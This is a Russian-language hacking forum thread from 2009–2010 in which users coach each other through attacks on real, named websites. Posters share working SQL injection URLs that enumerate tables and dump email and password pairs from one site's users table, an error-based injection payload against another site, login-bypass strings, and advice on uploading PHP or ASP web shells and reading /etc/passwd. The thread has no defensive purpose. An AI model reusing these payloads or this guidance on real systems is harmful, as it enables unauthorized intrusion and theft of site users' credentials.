Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. apolon47

    apolon47 Banned

    Joined:
    13 Apr 2009
    Messages:
    119
    Likes Received:
    14
    Reputations:
    4
    да, file_priv:Y. /etc/passwd отлично читает. пытался найти через ошибки.

    пропуская все через hex. не открывает. ошибок не выводит. пытаюсь залить шелл через mysql. magic_quotes=on. почитал на ачате как обойти. не получается.
     
  2. apolon47

    apolon47 Banned

    Joined:
    13 Apr 2009
    Messages:
    119
    Likes Received:
    14
    Reputations:
    4
    почитал статью https://forum.antichat.ru/showpost.php?p=663815&postcount=39

    мой запрос
    все выводит. пытаюсь сделать через второй запрос, чтобы обойти magic_quotes.
    заместо единицы вставляю hex кусок.
    основной запрос проходит, второй с ошибками. вроде все правильно делаю. подскажите в чем моя ошибка. спасибо
     
  3. Red_EYEs

    Red_EYEs Member

    Joined:
    7 Aug 2009
    Messages:
    32
    Likes Received:
    12
    Reputations:
    11
    -- -коментарий который отбрасывает конец запроса. /* */ - это окмментарий который отбрасывает середину
     
  4. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,520
    Likes Received:
    401
    Reputations:
    196

    так у самого юзверя БД права файловые есть?
     
  5. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    нет к сожаленью, если бы были то не спрашивал бы
     
  6. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,520
    Likes Received:
    401
    Reputations:
    196

    Ну тогда не зальешь. Да даже если бы и были права, и получилось бы залить php-шелл, то ты был бы в той же ситуации, что и сейчас - править, заливать не сможешь ничего. PHP под IIS(а там он судя по описанию) обычно сильно урезан в правах. Попробуй ливануть asp-шелл или coldfusion (если там стоит)
     
  7. apolon47

    apolon47 Banned

    Joined:
    13 Apr 2009
    Messages:
    119
    Likes Received:
    14
    Reputations:
    4
    /* - у меня там не срабатывает при подстановке. т.е

    -93+union+select+1,2/* не прокатит
     
  8. FlaktW

    FlaktW Elder - Старейшина

    Joined:
    19 Aug 2009
    Messages:
    500
    Likes Received:
    33
    Reputations:
    12
    Есть админка: http://www.rbeurope.org/admin
    Там два поля. При подстановке в логин ' or 1=1/* . Походу фильтруется /*.
    Что можно еще сделать?
     
  9. h00lyshit!

    h00lyshit! [From Nobody To Root]

    Joined:
    10 Sep 2009
    Messages:
    289
    Likes Received:
    290
    Reputations:
    195
    Если действительно фильтруеться слеш и нужно отбросить запрос, попробуй "--" или "--+" или ")--+", если там канечно в этом дело, посмотреть не могу.
     
    #12089 h00lyshit!, 31 Mar 2010
    Last edited: 31 Mar 2010
  10. Strilo4ka

    Strilo4ka

    Joined:
    5 Apr 2009
    Messages:
    709
    Likes Received:
    729
    Reputations:
    948
    Code:
    _http://www.rbeurope.org/afiseaza.php?id=20+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,version%28%29,25,26,27--+
    Таблицы:
    HTML:
    articole:butic_livrari:butic_optiuni:butic_zone:cat_activite:citizenships:county:docs:emails:events:eventsdetails:eventspictures:hotel_prices:imagini:institute:letters:limbi:livration:mesaje:mesaje_admin:mesaje_old:monede:newsletter:persons:pictures:plati:plati_backup:produse:registration_fees:rezervari_hotel:scroll:seminar:sess:specific:tari:users:users_backup 	 
    Code:
    _http://www.rbeurope.org/afiseaza.php?id=20+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,GROUP_CONCAT%28COLUMN_NAME%20SEPARATOR%200x3a%29%20,25,26,27+FROM%20information_schema.COLUMNS%20WHERE%20TABLE_NAME=0x7573657273--+
    Колонки users:
    HTML:
    id:title:lastname:firstname:email:password:position:organization:postal_address:compl_address:zip_code:town:id_tari:id_citizenships:phone:fax:nametag_name:nametag_affiliation:reg_fees:dinner1:dinner2:flag:platit:valoare 	 
    
    Code:
    _http://www.rbeurope.org/afiseaza.php?id=20+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,concat_ws%280x3a,email,password%29%20,25,26,27+FROM+users+limit+303,1--+
    Кстати, не набирайте никто http://www.rbeurope.org/login.php :)
     
    #12090 Strilo4ka, 31 Mar 2010
    Last edited: 31 Mar 2010
    1 person likes this.
  11. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886

    если шелл нормально не функционирует значит проблема с правами или/и php safe mode=on
     
    _________________________
  12. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    936
    Likes Received:
    527
    Reputations:
    204
    А с чего ты взял, что там возможно так авторизоваться? о_0
    Тем более там Basic-auth, она с БД не связана никак.
     
  13. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    интересно что ты мне этим хотел сказать? вроде здесь вопросы задают и отвечают на них если реально знают что и как..а ты что мне посоветовал ? или хочешь мне указать какой я глупый что не увидел сейф мод?.... я шеллов перевидал не мало...и если спрашиваю что и как то значит ситуация неординарная....
    и кстати сейф мод офф и папки и файлы все зеленые если ты понимаешь что я имею в виду, я вроде написал выше что смущает меня то что везде вроде права зеленые , но ни править ни заливать ничего нельзя.... надеюсь сейчас нормальным турецким языком отписал? и все меня поняли
     
  14. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,520
    Likes Received:
    401
    Reputations:
    196

    в венде нет прав как в линуксе - 777, 755 и прочего. php видит файлы как 666, а директории как 777(хотя это условности, которые ничего не значат). А права доступа устанавливаются в IIS и в настройках серва.
     
  15. Strilo4ka

    Strilo4ka

    Joined:
    5 Apr 2009
    Messages:
    709
    Likes Received:
    729
    Reputations:
    948
    Я устанавливал двиг какой то, непомню, на винде(стоит денвер!) и не мог попасть на сайт после установки. Изменил через функцию chmod в пхп файл, права которого было указано что надо изменить, то пустило.Как это понимать хз, так как на винде нет прав!?
    ps не надо говорить что я чето завтыкал!
     
    #12095 Strilo4ka, 31 Mar 2010
    Last edited: 31 Mar 2010
  16. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    ))) это просто слет какой-то сегодня )
     
  17. Darren

    Darren Banned

    Joined:
    14 Jun 2008
    Messages:
    34
    Likes Received:
    5
    Reputations:
    6
    http://www.4ips.biz/products.php?id=71+union+select+1,2,3,4%20--
    через order by получается что 4 колонки но подставляя пишет что не верное кол-во, пробывал менять лимит - бесполезно

    и ещё: чем можно заменить знак кавычки кроме как через hex?
     
  18. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    Code:
    http://www.4ips.biz/products.php?id=(select+1+from+(select+count(0),concat((select+version()),floor(rand(0)*2))+from+pics_db+group+by+2+limit+1)a)
    
     
    1 person likes this.
  19. Strilo4ka

    Strilo4ka

    Joined:
    5 Apr 2009
    Messages:
    709
    Likes Received:
    729
    Reputations:
    948
    CHAR
     
  20. Darren

    Darren Banned

    Joined:
    14 Jun 2008
    Messages:
    34
    Likes Received:
    5
    Reputations:
    6
    Pashkela а как ты узнал о существовании таблицы pics_db, брут?
    и как через такую ошибку, зная название таблицы можно узнать название столбцов?

    http://www.4ips.biz/products.php?id=(select+1+from+(select+count(0),co ncat((select+pic s_db.*),floor(rand(0)*2))+from+pic s_db+group+by+2+limit+1)a)

    ?
     
Thread Status:
Not open for further replies.